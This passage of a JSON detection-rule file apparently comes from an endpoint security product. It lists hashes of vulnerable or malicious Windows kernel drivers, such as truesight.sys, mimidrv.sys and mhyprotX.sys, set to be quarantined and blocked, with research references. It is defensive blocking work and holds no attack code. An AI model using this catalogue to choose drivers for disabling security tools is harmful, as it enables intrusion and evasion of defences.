[authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2ab6e22c-f0af-53d5-8c43-ecd3d46c59c2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492431Z", + "creation_date": "2026-03-23T11:45:31.492433Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492438Z", + "rule_level": null, + "rule_level_override": 
null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8f7e34a971f2a2a3d473432d9cea4c8d6ec680184e2972230795a1f33406218d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2ac2a541-2fc6-5000-9215-4139ef1d61cd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817609Z", + "creation_date": "2026-03-23T11:45:30.817611Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817616Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3678ba63d62efd3b706d1b661d631ded801485c08b5eb9a3ef38380c6cff319a", + "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2acf40da-baa4-55f7-a6d3-12dc8f88069a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821908Z", + "creation_date": "2026-03-23T11:45:31.821910Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821915Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e84886c82660f3bd9b6e04024251bfbb8dbc5690c567feb163cc751d5c00cc2d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2ae19c56-8543-5d7f-afc2-f7a040fbcec1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621651Z", + "creation_date": "2026-03-23T11:45:29.621653Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621658Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0ee5067ce48883701824c5b1ad91695998916a3702cf8086962fbe58af74b2d6", + "comment": 
"ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2af7c7d6-9b58-538b-9829-af0506a4b402", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614006Z", + "creation_date": "2026-03-23T11:45:29.614008Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614013Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b179e1ab6dc0b1aee783adbcad4ad6bb75a8a64cb798f30c0dd2ee8aaf43e6de", + "comment": "Huawei vulnerable drivers (aka HwOs2Ec10x64.sys and HwOs2Ec7x64.sys) [CVE-2019-5241] [https://www.microsoft.com/security/blog/2019/03/25/from-alert-to-driver-vulnerability-microsoft-defender-atp-investigation-unearths-privilege-escalation-flaw/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2af81a35-f15a-506b-aaad-ae8f3e28bcf5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464842Z", + "creation_date": "2026-03-23T11:45:30.464845Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464854Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fefc070a5f6a9c0415e1c6f44512a33e8d163024174b30a61423d00d1e8f9bf2", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2b05261b-235b-5527-834b-8bed12ee858b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621513Z", + "creation_date": "2026-03-23T11:45:29.621515Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621520Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "72322fa8bba20df6966acbcf41e83747893fd173cd29de99b5ad1a5d3bf8f2de", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2b0ba12d-b21b-5abe-957a-c358d33a6004", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.500708Z", + "creation_date": "2026-03-23T11:45:31.500711Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.500720Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3d70435e28f05a78a0cf513383da887cce3b4d311e1407149c72581cb00785aa", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2b0de7f1-3c19-546a-b09a-938e620febe1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606249Z", + "creation_date": "2026-03-23T11:45:29.606252Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.606261Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c089a31ac95d41ed02d1e4574962f53376b36a9e60ff87769d221dc7d1a3ecfa", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2b1b146a-d57e-5e9f-8fa1-9d5bfc137679", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.474396Z", + "creation_date": "2026-03-23T11:45:31.474399Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.474407Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b7282653f7af709a7740d785a93b1ea245ab26d177c1c4a58bf48b9fceae6204", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2b251617-d326-5f78-9a83-1ddaeb64d804", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612109Z", + "creation_date": "2026-03-23T11:45:29.612111Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612116Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dbcad271feda00f614ef9866886cde83e9fffac6e76694fd052790541bb7e993", + "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2b38124d-1062-5cc5-93b9-1784dd20bc34", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140690Z", + "creation_date": "2026-03-23T11:45:31.140692Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140697Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + 
"type": "hash", + "value": "e662bddd89c5886decdedb13b0037b88d5270bfeed1bafaa1e6c9199ab98fcc5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2b3a1fdb-e6d9-5175-9f91-e26c0c22c850", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464062Z", + "creation_date": "2026-03-23T11:45:30.464066Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464074Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aaf04d89fd15bc61265e545f8e1da80e20f59f90058ed343c62ee24358e3af9e", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2b4716eb-45a1-5704-9a6f-380db688d587", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146656Z", + "creation_date": "2026-03-23T11:45:32.146658Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146664Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1e42c8cb410a7ed653cfe62bbd8cf191f31a47337fe1ffcc35232d03f2da05ef", + "comment": "Vulnerable Kernel Driver (aka isodrivep64.sys) [https://www.loldrivers.io/drivers/0144dbef-1da8-406c-8e35-7afee57dc471/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2b5146da-a38a-5c85-b236-6643f1c3066d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.484389Z", + "creation_date": "2026-03-23T11:45:31.484393Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.484404Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dec60f8994b1773fcdf3fe19aa88288eae060801f38be150e789d6fbbec594f3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2b67c2da-a992-5868-9157-d85c58840512", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977622Z", + "creation_date": "2026-03-23T11:45:29.977624Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977632Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cff3fc66d54279b755ceedf89268847dbb5139227739e4689f5d9271b1d7923b", + "comment": "Vulnerable Kernel Driver (aka CorsairLLAccess64.sys) [https://www.loldrivers.io/drivers/a9d9cbb7-b5f6-4e74-97a5-29993263280e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2b8441e5-e033-5cb8-b8d8-1bc47883240c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493708Z", + "creation_date": "2026-03-23T11:45:31.493711Z", + "enabled": 
true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493721Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f5bf5496e3d659e3c2e2e307eed9950313aa786993b5ddda1c57ad63b845cc2f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2b8e6f7d-929c-56bd-ac32-d072c299cb09", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815624Z", + "creation_date": "2026-03-23T11:45:31.815626Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815632Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4c90eaa11eeb28ab56835396f73ce0b6cc53b16763b6458cd9785c7611e1bc5e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"2b9814c4-ac15-5d6b-814b-ae9c1bf43a71", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827748Z", + "creation_date": "2026-03-23T11:45:31.827752Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827760Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d6e12d25d540bcdcacfdc5b002ec1c143bfbc27ac1b245ba4c4b02cf0aad68be", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2b9aa810-44f3-5154-804a-2c95520bba88", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816339Z", + "creation_date": "2026-03-23T11:45:30.816341Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.816347Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1072beb3ff6b191b3df1a339e3a8c87a8dc5eae727f2b993ea51b448e837636a", + "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2ba4de36-e541-5562-9938-f56fefe825aa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.480047Z", + "creation_date": "2026-03-23T11:45:31.480051Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.480060Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4e9f8dba42f74f39e47db54d329e72eeedd4099ec19e07ed6118ea4226dcc89b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2baca094-5735-5f83-bf9e-37a9d250417f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.481326Z", + "creation_date": "2026-03-23T11:45:31.481330Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.481340Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "295b4bb1caf0ae8e2899d4a0d8993b89a8c8a49545c6189a7a159df1c53e35be", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2bb28b0e-7192-5fd1-b368-945713324554", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479404Z", + "creation_date": "2026-03-23T11:45:30.479406Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479411Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "b9ae1d53a464bc9bb86782ab6c55e2da8804c80a361139a82a6c8eef30fddd7c", + "comment": "Vulnerable Kernel Driver (aka segwindrvx64.sys) [https://www.loldrivers.io/drivers/a4aa80bc-4ecd-49ab-bc0f-0f49b07fdd7f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2bba6706-e84e-5e31-89a4-cad3682dfe0a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817142Z", + "creation_date": "2026-03-23T11:45:30.817144Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817150Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "478bcb750017cb6541f3dd0d08a47370f3c92eec998bc3825b5d8e08ee831b70", + "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2bbb4aa0-da50-567a-98d7-7dd04b24bf1a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
